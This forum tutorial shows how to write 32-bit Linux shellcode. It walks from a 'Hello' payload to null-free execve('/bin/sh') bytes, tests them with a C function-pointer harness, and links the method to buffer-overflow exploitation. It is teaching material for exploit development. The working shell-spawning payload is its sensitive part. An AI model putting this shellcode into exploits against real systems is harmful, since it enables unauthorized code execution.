Let's write some ShellcodeThis is a followup thread from my previous thread
https://evilzone.org/tutorials/let's-write-a-buffer-overflow/ and although it's not essential, I suggest you read it if you would like to understand how what will be produced in this tutorial can be used in an exploit.
In recent days I've noticed a lot of people don't understand how Shellcode is created and proceed to speak of it as if it's some mystical art. Honestly, it's anything but. Shellcode is simply machine code in a much nicer form. In this tutorial you will discover the basics of designing Executable Shellcode. For a tutorial on Return Oriented Shellcode, please refer to Divine's wonderful tutorial on Return Oriented Programming.
What can we use Shellcode to do?In short, anything (within reason).
Note: I will be covering both Linux and Windows Shellcode in two separate tutorials
How do we create Executable Shellcode?Good question, and an easy one to answer at that too. You could write Shellcode by hand, however that could become extremely tedious. What we're going to be doing is writing our wanted code to be executed in ASM and CONVERT it to Shellcode. So let's begin with a simple "Hello Ergo!" example:
Below is the basic assembly code for the program.
;example.asm
global _start
SECTION .text
_start:
mov eax, 0x4
mov ebx, 0x1
mov ecx, msg ;set the message
mov edx, 0xD
int 0x80 ;display the message
mov eax, 0x1
mov ebx, 0x0
int 0x80 ;quit the program
SECTION .data
msg db 'Hello Ergo!',0dh,0ah
cogito@ergo:~$ nasm -f elf example.asm
cogito@ergo:~$ ld example.o -o example
cogito@ergo:~$ objdump -d example
example: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 0d 00 00 00 mov $0xd,%edx
8048094: cd 80 int $0x80
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80
And thus the shellcode would be:
\xb8\x04\x00\x00\x00
\xbb\x01\x00\x00\x00
\xb9\xa4\x90\x04\x08
\xba\x0d\x00\x00\x00
\xcd\x80
\xb8\x01\x00\x00\x00
\xbb\x00\x00\x00\x00
\xcd\x80Now, this won't work as Shellcode there are several rules you need to follow when designing. One of these rules is that we cannot access the .data section. This is because it is not dumped when trying to create the Shellcode. As shown above, msg has been replaced by a memory address. This memory address means NOTHING when the Shellcode is executed on it's own. Only information in the .text section will be displayed.
But how do we print some text if we're only using the .text?
A good question, another simple answer. Instead of the above ASM code, we're going to do something different. Don't worry if you don't understand what I'm doing instantly, I will explain the important areas.
global _start
SECTION .text
_start:
jmp string
display:
mov eax, 0x4
mov ebx, 0x1
pop ecx ;set the message
mov edx, 0xD
int 0x80 ;display the message
mov eax, 0x1
mov ebx, 0x0
int 0x80 ;quit the program
string:
call display
db 'Hello Ergo!',0dh,0ah
I shouldn't really need to go through much of this as I'm sure you're all fairly competent in ASM, so I'll just go over the main point.
In order to display the text, we need to get a memory address of the text itself. The above method is a pretty smart way to do this. First, the program jumps to the label "string". When it does so, it proceeds to call to the label "display". As you know, when you use the call instruction, the computer pushes the address of the next instruction to be executed onto the stack for future reference (for when the program returns).
In the display label, we've done everything as we normally would with one exception. Instead of doing "mov ecx, msg" we have done "pop ecx". That's because we're now popping the address of the string fro the stack into the appropriate register.
So now this should work, right? Let's assemble and view the bytes.
example: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 1e jmp 8048080 <string>
08048062 <display>:
8048062: b8 04 00 00 00 mov $0x4,%eax
8048067: bb 01 00 00 00 mov $0x1,%ebx
804806c: 59 pop %ecx
804806d: ba 0d 00 00 00 mov $0xd,%edx
8048072: cd 80 int $0x80
8048074: b8 01 00 00 00 mov $0x1,%eax
8048079: bb 00 00 00 00 mov $0x0,%ebx
804807e: cd 80 int $0x80
08048080 <string>:
8048080: e8 dd ff ff ff call 8048062 <display>
8048085: 48 dec %eax
8048086: 65 gs
8048087: 6c insb (%dx),%es:(%edi)
8048088: 6c insb (%dx),%es:(%edi)
8048089: 6f outsl %ds:(%esi),(%dx)
804808a: 20 45 72 and %al,0x72(%ebp)
804808d: 67 6f outsl %ds:(%si),(%dx)
804808f: 21 .byte 0x21
8048090: 0d .byte 0xd
8048091: 0a .byte 0xa
and as Shellcode:
\xeb\x1e\xb8\x04\x00\x00\x00
\xbb\x01\x00\x00\x00
\x59
\xba\x0d\x00\x00\x00
\xcd\x80
\xb8\x01\x00\x00\x00
\xbb\x00\x00\x00\x00
\xcd\x80
\xe8\xdd\xff\xff\xff
\x48
\x65
\x6c
\x6c
\x6f
\x20\x45\x72
\x67\x6f
\x21
\x0d
\x0aHow do we test it and see whether it'll execute or not?Well there are lots of ways, but my favorite is just to write a quick program in C that uses a function pointer to execute the Shellcode.
Here's our code:
//
//Shellcode Executor
//shell.c
//
char code[] = "\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0d\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x45\x72\x67\x6f\x21\x0d\x0a";
int main(int argc, char **argv)
{
int (*point)();
point=(int(*)()) code;
(int)(*point)();
}
Which essentially declares a function pointer and then sets it to the address of the Shellcode. The program then proceeds to execute the function as it normally would, except it instead does so as a pointer.
cogito@ergo:~$ gcc -o shell shell.c
cogito@ergo:~$ ./shell
Hello Ergo!
cogito@ergo:~$
Success!
Is that all there is to it?Unfortunately not. As you begin to experiment with Shellcode you will come across a lot of ways that Shellcode does not execute. For example, null bytes could be affecting what's displayed, ASLR could be preventing you from testing out your code, or NX Bit (No-Execute) could also cause some problems. This is why Shellcode writing can get a bit difficult. You need to really begin to understand how the operating system works and how you can bypass it.
So let's try something a little more impressive than just displaying a message. We'll be creating some Shellcode that spawns a shell (hence the name Shellcode). The below code uses the technique above for getting text.
shell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 1b jmp 804807d <location>
08048062 <shell>:
8048062: b8 00 00 00 00 mov $0x0,%eax
8048067: 5e pop %esi
8048068: 88 46 07 mov %al,0x7(%esi)
804806b: 89 76 08 mov %esi,0x8(%esi)
804806e: 89 46 0c mov %eax,0xc(%esi)
8048071: b0 0b mov $0xb,%al
8048073: 8d 1e lea (%esi),%ebx
8048075: 8d 4e 08 lea 0x8(%esi),%ecx
8048078: 8d 56 0c lea 0xc(%esi),%edx
804807b: cd 80 int $0x80
0804807d <location>:
804807d: e8 e0 ff ff ff call 8048062 <shell>
8048082: 2f das
8048083: 62 69 6e bound %ebp,0x6e(%ecx)
8048086: 2f das
8048087: 73 68 jae 80480f1 <location+0x74>
Will this work? Nope, there are several null bytes. "xor eax,eax" is an alternative to "mov eax,0x0". The difference is that the xor way doesn't produce any null bytes. If we use that, we can combat this problem.
So let's try this again.
global _start
SECTION .text
_start:
jmp location
shell:
xor eax,eax
pop esi
mov byte [esi+7],al
mov dword [esi+8],esi
mov dword [esi+12],eax
mov al,0xb
lea ebx,[esi]
lea ecx,[esi+8]
lea edx,[esi+12]
int 0x80
location:
call shell
db "/bin/sh"
Which dumps as:
shell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 18 jmp 804807a <location>
08048062 <shell>:
8048062: 31 c0 xor %eax,%eax
8048064: 5e pop %esi
8048065: 88 46 07 mov %al,0x7(%esi)
8048068: 89 76 08 mov %esi,0x8(%esi)
804806b: 89 46 0c mov %eax,0xc(%esi)
804806e: b0 0b mov $0xb,%al
8048070: 8d 1e lea (%esi),%ebx
8048072: 8d 4e 08 lea 0x8(%esi),%ecx
8048075: 8d 56 0c lea 0xc(%esi),%edx
8048078: cd 80 int $0x80
0804807a <location>:
804807a: e8 e3 ff ff ff call 8048062 <shell>
804807f: 2f das
8048080: 62 69 6e bound %ebp,0x6e(%ecx)
8048083: 2f das
8048084: 73 68 jae 80480ee <location+0x74>
And after using it in our function pointer code:
cogito@ergo:~$ ./shell
sh-2.05b$
Another Success.
Thanks for reading and I hope you learned something.